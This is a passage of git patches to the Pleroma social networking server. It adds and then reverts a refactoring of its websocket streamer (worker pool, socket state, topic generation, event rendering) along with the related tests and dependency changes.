+ true <- should_send?(user, item) do
+ send(transport_pid, {:text, StreamerView.render("notification.json", socket_user, item)})
+ end
+ end)
+ end
+
+ defp do_stream(%{topic: "user", item: item}) do
+ Logger.debug("Trying to push to users")
+
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "user:#{id}" end)
+
+ Enum.each(recipient_topics, fn topic ->
+ push_to_socket(State.get_sockets(), topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: topic, item: item}) do
+ Logger.debug("Trying to push to #{topic}")
+ Logger.debug("Pushing item to #{topic}")
+ push_to_socket(State.get_sockets(), topic, item)
+ end
+
+ defp should_send?(%User{} = user, %Activity{} = item) do
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+ reblog_mutes = user.info.muted_reblogs || []
+ domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
+
+ with parent when not is_nil(parent) <- Object.normalize(item),
+ true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
+ true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
+ %{host: item_host} <- URI.parse(item.actor),
+ %{host: parent_host} <- URI.parse(parent.data["actor"]),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
+ true <- thread_containment(item, user),
+ false <- CommonAPI.thread_muted?(user, item) do
+ true
+ else
+ _ -> false
+ end
+ end
+
+ defp should_send?(%User{} = user, %Notification{activity: activity}) do
+ should_send?(user, activity)
+ end
+
+ def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{
+ transport_pid: transport_pid,
+ user: socket_user
+ } ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket_user do
+ user = User.get_cached_by_ap_id(socket_user.ap_id)
+
+ if should_send?(user, item) do
+ send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
+ end
+ else
+ send(transport_pid, {:text, StreamerView.render("update.json", item)})
+ end
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Participation{} = participation) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
+ send(transport_pid, {:text, StreamerView.render("conversation.json", participation)})
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Activity{
+ data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
+ }) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
+ send(
+ transport_pid,
+ {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
+ )
+ end)
+ end
+
+ def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
+
+ def push_to_socket(topics, topic, item) do
+ Enum.each(topics[topic] || [], fn %StreamerSocket{
+ transport_pid: transport_pid,
+ user: socket_user
+ } ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket_user do
+ user = User.get_cached_by_ap_id(socket_user.ap_id)
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+
+ with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
+ true <- thread_containment(item, user) do
+ send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
+ end
+ else
+ send(transport_pid, {:text, StreamerView.render("update.json", item)})
+ end
+ end)
+ end
+
+ @spec thread_containment(Activity.t(), User.t()) :: boolean()
+ defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
+
+ defp thread_containment(activity, user) do
+ if Config.get([:instance, :skip_thread_containment]) do
+ true
+ else
+ ActivityPub.contain_activity(activity, user)
+ end
+ end
+end
diff --git a/lib/pleroma/web/views/streamer_view.ex b/lib/pleroma/web/views/streamer_view.ex
new file mode 100644
index 000000000..b13030fa0
--- /dev/null
+++ b/lib/pleroma/web/views/streamer_view.ex
@@ -0,0 +1,66 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.StreamerView do
+ use Pleroma.Web, :view
+
+ alias Pleroma.Activity
+ alias Pleroma.Conversation.Participation
+ alias Pleroma.Notification
+ alias Pleroma.User
+ alias Pleroma.Web.MastodonAPI.NotificationView
+
+ def render("update.json", %Activity{} = activity, %User{} = user) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity,
+ for: user
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("notification.json", %User{} = user, %Notification{} = notify) do
+ %{
+ event: "notification",
+ payload:
+ NotificationView.render(
+ "show.json",
+ %{notification: notify, for: user}
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("update.json", %Activity{} = activity) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def render("conversation.json", %Participation{} = participation) do
+ %{
+ event: "conversation",
+ payload:
+ Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
+ participation: participation,
+ for: participation.user
+ })
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+end
diff --git a/mix.exs b/mix.exs
index f1e98585b..911ebad1d 100644
--- a/mix.exs
+++ b/mix.exs
@@ -144,6 +144,7 @@ defp deps do
git: "https://git.pleroma.social/pleroma/http_signatures.git",
ref: "293d77bb6f4a67ac8bde1428735c3b42f22cbb30"},
{:telemetry, "~> 0.3"},
+ {:poolboy, "~> 1.5"},
{:prometheus_ex, "~> 3.0"},
{:prometheus_plugs, "~> 1.1"},
{:prometheus_phoenix, "~> 1.3"},
diff --git a/mix.lock b/mix.lock
index 41697dd5c..0bf6a811e 100644
--- a/mix.lock
+++ b/mix.lock
@@ -73,6 +73,7 @@
"plug_crypto": {:hex, :plug_crypto, "1.0.0", "18e49317d3fa343f24620ed22795ec29d4a5e602d52d1513ccea0b07d8ea7d4d", [:mix], [], "hexpm"},
"plug_static_index_html": {:hex, :plug_static_index_html, "1.0.0", "840123d4d3975585133485ea86af73cb2600afd7f2a976f9f5fd8b3808e636a0", [:mix], [{:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"poison": {:hex, :poison, "3.1.0", "d9eb636610e096f86f25d9a46f35a9facac35609a7591b3be3326e99a0484665", [:mix], [], "hexpm"},
+ "poolboy": {:hex, :poolboy, "1.5.2", "392b007a1693a64540cead79830443abf5762f5d30cf50bc95cb2c1aaafa006b", [:rebar3], [], "hexpm"},
"postgrex": {:hex, :postgrex, "0.14.3", "5754dee2fdf6e9e508cbf49ab138df964278700b764177e8f3871e658b345a1e", [:mix], [{:connection, "~> 1.0", [hex: :connection, repo: "hexpm", optional: false]}, {:db_connection, "~> 2.0", [hex: :db_connection, repo: "hexpm", optional: false]}, {:decimal, "~> 1.5", [hex: :decimal, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}], "hexpm"},
"prometheus": {:hex, :prometheus, "4.4.1", "1e96073b3ed7788053768fea779cbc896ddc3bdd9ba60687f2ad50b252ac87d6", [:mix, :rebar3], [], "hexpm"},
"prometheus_ecto": {:hex, :prometheus_ecto, "1.4.1", "6c768ea9654de871e5b32fab2eac348467b3021604ebebbcbd8bcbe806a65ed5", [:mix], [{:ecto, "~> 2.0 or ~> 3.0", [hex: :ecto, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
diff --git a/test/activity/ir/topics_test.exs b/test/activity/ir/topics_test.exs
new file mode 100644
index 000000000..e75f83586
--- /dev/null
+++ b/test/activity/ir/topics_test.exs
@@ -0,0 +1,141 @@
+defmodule Pleroma.Activity.Ir.TopicsTest do
+ use Pleroma.DataCase
+
+ alias Pleroma.Activity
+ alias Pleroma.Activity.Ir.Topics
+ alias Pleroma.Object
+
+ require Pleroma.Constants
+
+ describe "poll answer" do
+ test "produce no topics" do
+ activity = %Activity{object: %Object{data: %{"type" => "Answer"}}}
+
+ assert [] == Topics.get_activity_topics(activity)
+ end
+ end
+
+ describe "non poll answer" do
+ test "always add user and list topics" do
+ activity = %Activity{object: %Object{data: %{"type" => "FooBar"}}}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "user")
+ assert Enum.member?(topics, "list")
+ end
+ end
+
+ describe "public visibility" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Note"}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "produces public topic", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public")
+ end
+
+ test "local action produces public:local topic", %{activity: activity} do
+ activity = %{activity | local: true}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:local")
+ end
+
+ test "non-local action does not produce public:local topic", %{activity: activity} do
+ activity = %{activity | local: false}
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:local")
+ end
+ end
+
+ describe "public visibility create events" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Create", "attachment" => []}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "with no attachments doesn't produce public:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:media")
+ refute Enum.member?(topics, "public:local:media")
+ end
+
+ test "converts tags to hash tags", %{activity: %{object: %{data: data} = object} = activity} do
+ tagged_data = Map.put(data, "tag", ["foo", "bar"])
+ activity = %{activity | object: %{object | data: tagged_data}}
+
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "hashtag:foo")
+ assert Enum.member?(topics, "hashtag:bar")
+ end
+
+ test "only converts strinngs to hash tags", %{
+ activity: %{object: %{data: data} = object} = activity
+ } do
+ tagged_data = Map.put(data, "tag", [2])
+ activity = %{activity | object: %{object | data: tagged_data}}
+
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "hashtag:2")
+ end
+ end
+
+ describe "public visibility create events with attachments" do
+ setup do
+ activity = %Activity{
+ object: %Object{data: %{"type" => "Create", "attachment" => ["foo"]}},
+ data: %{"to" => [Pleroma.Constants.as_public()]}
+ }
+
+ {:ok, activity: activity}
+ end
+
+ test "produce public:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:media")
+ end
+
+ test "local produces public:local:media topics", %{activity: activity} do
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "public:local:media")
+ end
+
+ test "non-local doesn't produce public:local:media topics", %{activity: activity} do
+ activity = %{activity | local: false}
+
+ topics = Topics.get_activity_topics(activity)
+
+ refute Enum.member?(topics, "public:local:media")
+ end
+ end
+
+ describe "non-public visibility" do
+ test "produces direct topic" do
+ activity = %Activity{object: %Object{data: %{"type" => "Note"}}, data: %{"to" => []}}
+ topics = Topics.get_activity_topics(activity)
+
+ assert Enum.member?(topics, "direct")
+ refute Enum.member?(topics, "public")
+ refute Enum.member?(topics, "public:local")
+ refute Enum.member?(topics, "public:media")
+ refute Enum.member?(topics, "public:local:media")
+ end
+ end
+end
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index 63bf73412..c04262808 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -11,7 +11,6 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
alias Pleroma.Integration.WebsocketClient
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.OAuth
- alias Pleroma.Web.Streamer
@path Pleroma.Web.Endpoint.url()
|> URI.parse()
@@ -19,16 +18,6 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
|> Map.put(:path, "/api/v1/streaming")
|> URI.to_string()
- setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
- end
-
def start_socket(qs \\ nil, headers \\ []) do
path =
case qs do
@@ -53,12 +42,14 @@ test "requires authentication and a valid token for protected streams" do
end)
end
+ @tag needs_streamer: true
test "allows public streams without authentication" do
assert {:ok, _} = start_socket("?stream=public")
assert {:ok, _} = start_socket("?stream=public:local")
assert {:ok, _} = start_socket("?stream=hashtag&tag=lain")
end
+ @tag needs_streamer: true
test "receives well formatted events" do
user = insert(:user)
{:ok, _} = start_socket("?stream=public")
@@ -103,6 +94,7 @@ test "accepts valid tokens", state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{state.token.token}")
end
+ @tag needs_streamer: true
test "accepts the 'user' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{token.token}")
@@ -111,6 +103,7 @@ test "accepts the 'user' stream", %{token: token} = _state do
end) =~ ":badarg"
end
+ @tag needs_streamer: true
test "accepts the 'user:notification' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user:notification&access_token=#{token.token}")
@@ -119,6 +112,7 @@ test "accepts the 'user:notification' stream", %{token: token} = _state do
end) =~ ":badarg"
end
+ @tag needs_streamer: true
test "accepts valid token on Sec-WebSocket-Protocol header", %{token: token} do
assert {:ok, _} = start_socket("?stream=user", [{"Sec-WebSocket-Protocol", token.token}])
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 3be9db09b..3d2f9a8fc 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -69,16 +69,7 @@ test "does not create a notification for subscribed users if status is a reply"
end
describe "create_notification" do
- setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
- end
-
+ @tag needs_streamer: true
test "it creates a notification for user and send to the 'user' and the 'user:notification' stream" do
user = insert(:user)
task = Task.async(fn -> assert_receive {:text, _}, 4_000 end)
diff --git a/test/support/conn_case.ex b/test/support/conn_case.ex
index ec5892ff5..b39c70677 100644
--- a/test/support/conn_case.ex
+++ b/test/support/conn_case.ex
@@ -40,6 +40,10 @@ defmodule Pleroma.Web.ConnCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
+ if tags[:needs_streamer] do
+ start_supervised(Pleroma.Web.Streamer.supervisor())
+ end
+
{:ok, conn: Phoenix.ConnTest.build_conn()}
end
end
diff --git a/test/support/data_case.ex b/test/support/data_case.ex
index f3d98e7e3..17fa15214 100644
--- a/test/support/data_case.ex
+++ b/test/support/data_case.ex
@@ -39,6 +39,10 @@ defmodule Pleroma.DataCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
+ if tags[:needs_streamer] do
+ start_supervised(Pleroma.Web.Streamer.supervisor())
+ end
+
:ok
end
diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs
index d0118fefa..4100108a5 100644
--- a/test/web/activity_pub/activity_pub_test.exs
+++ b/test/web/activity_pub/activity_pub_test.exs
@@ -38,9 +38,7 @@ test "it streams them out" do
stream: fn _, _ -> nil end do
ActivityPub.stream_out_participations(conversation.participations)
- Enum.each(participations, fn participation ->
- assert called(Pleroma.Web.Streamer.stream("participation", participation))
- end)
+ assert called(Pleroma.Web.Streamer.stream("participation", participations))
end
end
end
diff --git a/test/web/streamer/ping_test.exs b/test/web/streamer/ping_test.exs
new file mode 100644
index 000000000..3d52c00e4
--- /dev/null
+++ b/test/web/streamer/ping_test.exs
@@ -0,0 +1,36 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.PingTest do
+ use Pleroma.DataCase
+
+ import Pleroma.Factory
+ alias Pleroma.Web.Streamer
+
+ setup do
+ start_supervised({Streamer.supervisor(), [ping_interval: 30]})
+
+ :ok
+ end
+
+ describe "sockets" do
+ setup do
+ user = insert(:user)
+ {:ok, %{user: user}}
+ end
+
+ test "it sends pings", %{user: user} do
+ task =
+ Task.async(fn ->
+ assert_receive {:text, received_event}, 40
+ assert_receive {:text, received_event}, 40
+ assert_receive {:text, received_event}, 40
+ end)
+
+ Streamer.add_socket("public", %{transport_pid: task.pid, assigns: %{user: user}})
+
+ Task.await(task)
+ end
+ end
+end
diff --git a/test/web/streamer/state_test.exs b/test/web/streamer/state_test.exs
new file mode 100644
index 000000000..d1aeac541
--- /dev/null
+++ b/test/web/streamer/state_test.exs
@@ -0,0 +1,54 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.StateTest do
+ use Pleroma.DataCase
+
+ import Pleroma.Factory
+ alias Pleroma.Web.Streamer
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ @moduletag needs_streamer: true
+
+ describe "sockets" do
+ setup do
+ user = insert(:user)
+ user2 = insert(:user)
+ {:ok, %{user: user, user2: user2}}
+ end
+
+ test "it can add a socket", %{user: user} do
+ Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
+
+ assert(%{"public" => [%StreamerSocket{transport_pid: 1}]} = Streamer.get_sockets())
+ end
+
+ test "it can add multiple sockets per user", %{user: user} do
+ Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
+ Streamer.add_socket("public", %{transport_pid: 2, assigns: %{user: user}})
+
+ assert(
+ %{
+ "public" => [
+ %StreamerSocket{transport_pid: 2},
+ %StreamerSocket{transport_pid: 1}
+ ]
+ } = Streamer.get_sockets()
+ )
+ end
+
+ test "it will not add a duplicate socket", %{user: user} do
+ Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
+ Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
+
+ assert(
+ %{
+ "activity" => [
+ %StreamerSocket{transport_pid: 1}
+ ]
+ } = Streamer.get_sockets()
+ )
+ end
+ end
+end
diff --git a/test/web/streamer_test.exs b/test/web/streamer/streamer_test.exs
similarity index 86%
rename from test/web/streamer_test.exs
rename to test/web/streamer/streamer_test.exs
index 96fa7645f..88847e20f 100644
--- a/test/web/streamer_test.exs
+++ b/test/web/streamer/streamer_test.exs
@@ -5,24 +5,20 @@
defmodule Pleroma.Web.StreamerTest do
use Pleroma.DataCase
+ import Pleroma.Factory
+
alias Pleroma.List
alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Streamer
- import Pleroma.Factory
+ alias Pleroma.Web.Streamer.StreamerSocket
+ alias Pleroma.Web.Streamer.Worker
+ @moduletag needs_streamer: true
clear_config_all([:instance, :skip_thread_containment])
describe "user streams" do
setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
-
user = insert(:user)
notify = insert(:notification, user: user, activity: build(:note_activity))
{:ok, %{user: user, notify: notify}}
@@ -125,11 +121,9 @@ test "it sends to public" do
assert_receive {:text, _}, 4_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.post(other_user, %{"status" => "Test"})
@@ -138,7 +132,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
@@ -155,11 +149,9 @@ test "it sends to public" do
assert received_event == expected_event
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.delete(activity.id, other_user)
@@ -168,7 +160,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -189,9 +181,9 @@ test "it doesn't send to user if recipients invalid and thread containment is en
)
task = Task.async(fn -> refute_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -211,9 +203,9 @@ test "it sends message if recipients invalid and thread containment is disabled"
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -233,9 +225,9 @@ test "it sends message if recipients invalid and thread containment is enabled b
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -251,11 +243,9 @@ test "it doesn't send to blocked users" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.post(blocked_user, %{"status" => "Test"})
@@ -264,7 +254,7 @@ test "it doesn't send to blocked users" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -284,11 +274,9 @@ test "it doesn't send unwanted DMs to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -301,7 +289,7 @@ test "it doesn't send unwanted DMs to list" do
"list:#{list.id}" => [fake_socket]
}
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), topics)
Task.await(task)
end
@@ -318,11 +306,9 @@ test "it doesn't send unwanted private posts to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -335,12 +321,12 @@ test "it doesn't send unwanted private posts to list" do
"list:#{list.id}" => [fake_socket]
}
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), topics)
Task.await(task)
end
- test "it send wanted private posts to list" do
+ test "it sends wanted private posts to list" do
user_a = insert(:user)
user_b = insert(:user)
@@ -354,11 +340,9 @@ test "it send wanted private posts to list" do
assert_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -367,11 +351,12 @@ test "it send wanted private posts to list" do
"visibility" => "private"
})
- topics = %{
- "list:#{list.id}" => [fake_socket]
- }
+ Streamer.add_socket(
+ "list:#{list.id}",
+ fake_socket
+ )
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), %{})
Task.await(task)
end
@@ -387,11 +372,9 @@ test "it doesn't send muted reblogs" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user1
- }
+ user: user1
}
{:ok, create_activity} = CommonAPI.post(user3, %{"status" => "I'm kawen"})
@@ -401,7 +384,7 @@ test "it doesn't send muted reblogs" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", announce_activity)
+ Worker.push_to_socket(topics, "public", announce_activity)
Task.await(task)
end
@@ -417,6 +400,8 @@ test "it doesn't send posts from muted threads" do
task = Task.async(fn -> refute_receive {:text, _}, 4_000 end)
+ Process.sleep(4000)
+
Streamer.add_socket(
"user",
%{transport_pid: task.pid, assigns: %{user: user2}}
@@ -428,14 +413,6 @@ test "it doesn't send posts from muted threads" do
describe "direct streams" do
setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
-
:ok
end
@@ -480,6 +457,8 @@ test "it doesn't send conversation update to the 'direct' streamj when the last
refute_receive {:text, _}, 4_000
end)
+ Process.sleep(1000)
+
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
@@ -521,6 +500,8 @@ test "it sends conversation update to the 'direct' stream when a message is dele
assert last_status["id"] == to_string(create_activity.id)
end)
+ Process.sleep(1000)
+
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
From c623b4324deaf236334a0f77a81435b5bffadf3c Mon Sep 17 00:00:00 2001
From: kaniini
Date: Mon, 16 Sep 2019 09:09:21 +0000
Subject: [PATCH 079/272] Revert "Merge branch 'streamer-refactoring' into
'develop'"
This reverts merge request !1653
---
.gitignore | 4 -
config/config.exs | 4 -
lib/pleroma/activity/ir/topics.ex | 63 ----
lib/pleroma/application.ex | 2 +-
lib/pleroma/notification.ex | 6 +-
lib/pleroma/web/activity_pub/activity_pub.ex | 48 ++-
.../web/mastodon_api/websocket_handler.ex | 7 +-
lib/pleroma/web/streamer.ex | 318 ++++++++++++++++++
lib/pleroma/web/streamer/ping.ex | 33 --
lib/pleroma/web/streamer/state.ex | 68 ----
lib/pleroma/web/streamer/streamer.ex | 55 ---
lib/pleroma/web/streamer/streamer_socket.ex | 31 --
lib/pleroma/web/streamer/supervisor.ex | 33 --
lib/pleroma/web/streamer/worker.ex | 220 ------------
lib/pleroma/web/views/streamer_view.ex | 66 ----
mix.exs | 1 -
mix.lock | 1 -
test/activity/ir/topics_test.exs | 141 --------
test/integration/mastodon_websocket_test.exs | 16 +-
test/notification_test.exs | 11 +-
test/support/conn_case.ex | 4 -
test/support/data_case.ex | 4 -
test/web/activity_pub/activity_pub_test.exs | 4 +-
test/web/streamer/ping_test.exs | 36 --
test/web/streamer/state_test.exs | 54 ---
test/web/{streamer => }/streamer_test.exs | 105 +++---
26 files changed, 447 insertions(+), 888 deletions(-)
delete mode 100644 lib/pleroma/activity/ir/topics.ex
create mode 100644 lib/pleroma/web/streamer.ex
delete mode 100644 lib/pleroma/web/streamer/ping.ex
delete mode 100644 lib/pleroma/web/streamer/state.ex
delete mode 100644 lib/pleroma/web/streamer/streamer.ex
delete mode 100644 lib/pleroma/web/streamer/streamer_socket.ex
delete mode 100644 lib/pleroma/web/streamer/supervisor.ex
delete mode 100644 lib/pleroma/web/streamer/worker.ex
delete mode 100644 lib/pleroma/web/views/streamer_view.ex
delete mode 100644 test/activity/ir/topics_test.exs
delete mode 100644 test/web/streamer/ping_test.exs
delete mode 100644 test/web/streamer/state_test.exs
rename test/web/{streamer => }/streamer_test.exs (86%)
diff --git a/.gitignore b/.gitignore
index 3b0c7d361..4e71a7df0 100644
--- a/.gitignore
+++ b/.gitignore
@@ -43,7 +43,3 @@ docs/generated_config.md
# Code test coverage
/cover
/Elixir.*.coverdata
-
-.idea
-pleroma.iml
-
diff --git a/config/config.exs b/config/config.exs
index b1b98af93..ab6e00c98 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -331,10 +331,6 @@
follow_handshake_timeout: 500,
sign_object_fetches: true
-config :pleroma, :streamer,
- workers: 3,
- overflow_workers: 2
-
config :pleroma, :user, deny_follow_blocked: true
config :pleroma, :mrf_normalize_markup, scrub_policy: Pleroma.HTML.Scrubber.Default
diff --git a/lib/pleroma/activity/ir/topics.ex b/lib/pleroma/activity/ir/topics.ex
deleted file mode 100644
index 010897abc..000000000
--- a/lib/pleroma/activity/ir/topics.ex
+++ /dev/null
@@ -1,63 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Activity.Ir.Topics do
- alias Pleroma.Object
- alias Pleroma.Web.ActivityPub.Visibility
-
- def get_activity_topics(activity) do
- activity
- |> Object.normalize()
- |> generate_topics(activity)
- |> List.flatten()
- end
-
- defp generate_topics(%{data: %{"type" => "Answer"}}, _) do
- []
- end
-
- defp generate_topics(object, activity) do
- ["user", "list"] ++ visibility_tags(object, activity)
- end
-
- defp visibility_tags(object, activity) do
- case Visibility.get_visibility(activity) do
- "public" ->
- if activity.local do
- ["public", "public:local"]
- else
- ["public"]
- end
- |> item_creation_tags(object, activity)
-
- "direct" ->
- ["direct"]
-
- _ ->
- []
- end
- end
-
- defp item_creation_tags(tags, %{data: %{"type" => "Create"}} = object, activity) do
- tags ++ hashtags_to_topics(object) ++ attachment_topics(object, activity)
- end
-
- defp item_creation_tags(tags, _, _) do
- tags
- end
-
- defp hashtags_to_topics(%{data: %{"tag" => tags}}) do
- tags
- |> Enum.filter(&is_bitstring(&1))
- |> Enum.map(fn tag -> "hashtag:" <> tag end)
- end
-
- defp hashtags_to_topics(_), do: []
-
